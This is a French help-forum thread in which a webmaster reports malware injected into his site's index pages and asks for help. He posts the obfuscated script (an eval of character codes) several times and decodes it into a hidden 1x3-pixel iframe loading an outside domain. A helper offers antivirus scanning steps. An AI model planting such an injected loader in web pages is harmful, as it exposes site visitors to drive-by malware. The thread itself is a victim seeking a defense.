Virus sur mes
Fermé
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
-
11 mai 2009 à 15:18
Utilisateur anonyme - 11 mai 2009 à 20:18
Utilisateur anonyme - 11 mai 2009 à 20:18
A voir également:
- Virus sur mes
- Youtu.be virus - Accueil - Guide virus
- Svchost.exe virus - Guide
- Faux message virus ordinateur - Accueil - Arnaque
- Softonic virus ✓ - Forum Virus
- Faux message virus iphone - Forum iPhone
10 réponses
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
1
11 mai 2009 à 15:30
11 mai 2009 à 15:30
Oui si j'ai le droit de le poster le voila de suite :
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48))</script>'; ?>
Il se dechiffre facilement avec la fonction CAR() sous exel
Voila
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48))</script>'; ?>
Il se dechiffre facilement avec la fonction CAR() sous exel
Voila
Utilisateur anonyme
11 mai 2009 à 15:32
11 mai 2009 à 15:32
c'est marrant il est meme pas logique ce script je trouve
fais ceci par securité
> Télécharge Dr Web CureIt sur ton Bureau :
- Double clique <drweb-cureit.exe> et ensuite clique sur <Analyse>;
- Clique <Ok> à l'invite de l'analyse rapide. S'il trouve des processus infectés alors clique le bouton <Oui>.
Note : une fenêtre s'ouvrira avec options pour "Commander" ou "50% de réduction" : Quitte en cliquant le "X".
- Lorsque le scan rapide est terminé, clique sur le menu <Options> puis <Changer la configuration> ; Choisis l'onglet <Scanner>, et décoche <Analyse heuristique>. Clique ensuite sur <Ok>.
- De retour à la fenêtre principale : clique pour activer <Analyse complète>
- Clique le bouton avec flèche verte sur la droite, et le scan débutera.
- Clique <Oui> pour tout à l'invite "Désinfecter ?" lorsqu'un fichier est détecté, et ensuite clique "Désinfecter".
- Lorsque le scan sera complété, regarde si tu peux cliquer sur l' icône, adjacente aux fichiers détectés (plusieurs feuilles l'une sur l'autre). Si oui, alors clique dessus et ensuite clique sur l'icône <Suivant>, au dessous, et choisis <Déplacer en quarantaine l'objet indésirable>.
- Du menu principal de l'outil, au haut à gauche, clique sur le menu <Fichier> et choisis <Enregistrer le rapport>. Sauvegarde le rapport sur ton Bureau. Ce dernier se nommera DrWeb.csv
- Ferme Dr.Web Cureit
- Redémarre ton ordi (important car certains fichiers peuvent être déplacés/réparés au redémarrage).
- Suite au redémarrage, poste (Copie/Colle) le contenu du rapport de Dr.Web dans ta prochaine réponse.
fais ceci par securité
> Télécharge Dr Web CureIt sur ton Bureau :
- Double clique <drweb-cureit.exe> et ensuite clique sur <Analyse>;
- Clique <Ok> à l'invite de l'analyse rapide. S'il trouve des processus infectés alors clique le bouton <Oui>.
Note : une fenêtre s'ouvrira avec options pour "Commander" ou "50% de réduction" : Quitte en cliquant le "X".
- Lorsque le scan rapide est terminé, clique sur le menu <Options> puis <Changer la configuration> ; Choisis l'onglet <Scanner>, et décoche <Analyse heuristique>. Clique ensuite sur <Ok>.
- De retour à la fenêtre principale : clique pour activer <Analyse complète>
- Clique le bouton avec flèche verte sur la droite, et le scan débutera.
- Clique <Oui> pour tout à l'invite "Désinfecter ?" lorsqu'un fichier est détecté, et ensuite clique "Désinfecter".
- Lorsque le scan sera complété, regarde si tu peux cliquer sur l' icône, adjacente aux fichiers détectés (plusieurs feuilles l'une sur l'autre). Si oui, alors clique dessus et ensuite clique sur l'icône <Suivant>, au dessous, et choisis <Déplacer en quarantaine l'objet indésirable>.
- Du menu principal de l'outil, au haut à gauche, clique sur le menu <Fichier> et choisis <Enregistrer le rapport>. Sauvegarde le rapport sur ton Bureau. Ce dernier se nommera DrWeb.csv
- Ferme Dr.Web Cureit
- Redémarre ton ordi (important car certains fichiers peuvent être déplacés/réparés au redémarrage).
- Suite au redémarrage, poste (Copie/Colle) le contenu du rapport de Dr.Web dans ta prochaine réponse.
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
1
11 mai 2009 à 15:40
11 mai 2009 à 15:40
En fait ANTIVIR bloque bien le virus, et si je le laisse passer ,une fois l'analyse terminé il l'identifie et le supprime. C'est pas pour mon ordi que je m'inquiète. C'est surtout pour tous mes fichiers source. Si il peut ecrire dedans il peut tout faire.
J'ai peut-être mal protégé mes différents sites "entre l'url les zone de texte dangeureuse ...."
Merci de ton aide
Voila la traduction que j'ai pu faire de se script en bas de ma page index :
<?php echo '<script type="text/javascript">eval(String.fromCharCode(document.ancerite(<ifrifme src=http://anceollance.com/ width="1" height="3"><ifrifme>');))</script>'; ?>
J'ai peut-être mal protégé mes différents sites "entre l'url les zone de texte dangeureuse ...."
Merci de ton aide
Voila la traduction que j'ai pu faire de se script en bas de ma page index :
<?php echo '<script type="text/javascript">eval(String.fromCharCode(document.ancerite(<ifrifme src=http://anceollance.com/ width="1" height="3"><ifrifme>');))</script>'; ?>
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
1
11 mai 2009 à 18:21
11 mai 2009 à 18:21
J'ai vue que certaine personne avait déja été touché par ce virus mais leur symptome n'était pas tout à fait les même.
Personne ne sait comment je peut éviter se genre d'action (le virus ecrit sur mes pages "index" directement dans mon serveur il à même réussi à loger des sites afin que je les heberges dans mon espace personnel).
Pensé vous que cela peut venir de la saissie d'un virus dans une boite text qui s'affiche sur ma page index (Car je demande un code pour pouvoir accéder aux autres pages)
Merci de m'éclairer
Personne ne sait comment je peut éviter se genre d'action (le virus ecrit sur mes pages "index" directement dans mon serveur il à même réussi à loger des sites afin que je les heberges dans mon espace personnel).
Pensé vous que cela peut venir de la saissie d'un virus dans une boite text qui s'affiche sur ma page index (Car je demande un code pour pouvoir accéder aux autres pages)
Merci de m'éclairer
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
1
11 mai 2009 à 18:42
11 mai 2009 à 18:42
Je suis en train de faire l'analyse que tu m'avais demendé tout taleur, je te la poste dès que c'est fini.
(mais ca a l'air très long)
Merci de ton attention.
(mais ca a l'air très long)
Merci de ton attention.
Utilisateur anonyme
11 mai 2009 à 19:12
11 mai 2009 à 19:12
ca l'est oui tu as branché tous tes peripheriques au moins ?
fabien178
Messages postés
11
Date d'inscription
lundi 11 mai 2009
Statut
Membre
Dernière intervention
4 octobre 2010
1
11 mai 2009 à 19:41
11 mai 2009 à 19:41
Voila exactement ce que ecrit le virus HTML/Crypted.Gen .
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48))</script>'; ?>
Ici je vous ait traduit ce que voulais dire tout ces chiffres entre les parentheses :
</HTML><!-- ad --><!-- /ad -->
<?php echo '<script type="text/javascript">eval(String.fromCharCode(
var t=5;
var hjg4="woll";
var w="ance";
var re6=".";
var rrtt6="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');
var w6=87498000002340
))</script>'; ?>
Voila le code.
Voici la redraduction de la partie imcomprensible en remplacent les var :
document.write(<iframe src="http://www.wollance.com/" width="1" height="3"></iframe>');
Donc je vous réécrit le virus complet :
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(document.write(<iframe src="http://www.wollance.com/" width="1" height="3"></iframe>');))</script>'; ?>
Que fait exactement ce script ??et comment l'empécher d'ecrire sur mes pages d'index ?
(je vais aussi poster ce message dans un autres topic plus lié au javascript)
PS:l'anayse de mon PC est en cours.je posterais les résultats plus tard
MERCI de votre aide
Bien sur je ne peut pas lire le script du site web de déstination, car antivir me bloque l'acces .Cause : virus ,j'en atendais pas moin lol.
Help,help
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48))</script>'; ?>
Ici je vous ait traduit ce que voulais dire tout ces chiffres entre les parentheses :
</HTML><!-- ad --><!-- /ad -->
<?php echo '<script type="text/javascript">eval(String.fromCharCode(
var t=5;
var hjg4="woll";
var w="ance";
var re6=".";
var rrtt6="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');
var w6=87498000002340
))</script>'; ?>
Voila le code.
Voici la redraduction de la partie imcomprensible en remplacent les var :
document.write(<iframe src="http://www.wollance.com/" width="1" height="3"></iframe>');
Donc je vous réécrit le virus complet :
<!-- ad --><!-- /ad --><?php echo '<script type="text/javascript">eval(String.fromCharCode(document.write(<iframe src="http://www.wollance.com/" width="1" height="3"></iframe>');))</script>'; ?>
Que fait exactement ce script ??et comment l'empécher d'ecrire sur mes pages d'index ?
(je vais aussi poster ce message dans un autres topic plus lié au javascript)
PS:l'anayse de mon PC est en cours.je posterais les résultats plus tard
MERCI de votre aide
Bien sur je ne peut pas lire le script du site web de déstination, car antivir me bloque l'acces .Cause : virus ,j'en atendais pas moin lol.
Help,help
Utilisateur anonyme
11 mai 2009 à 20:18
11 mai 2009 à 20:18
oui le javascript c'est chaud comme truc ca
je n'ai pas le niveau pour cela :(
je n'ai pas le niveau pour cela :(
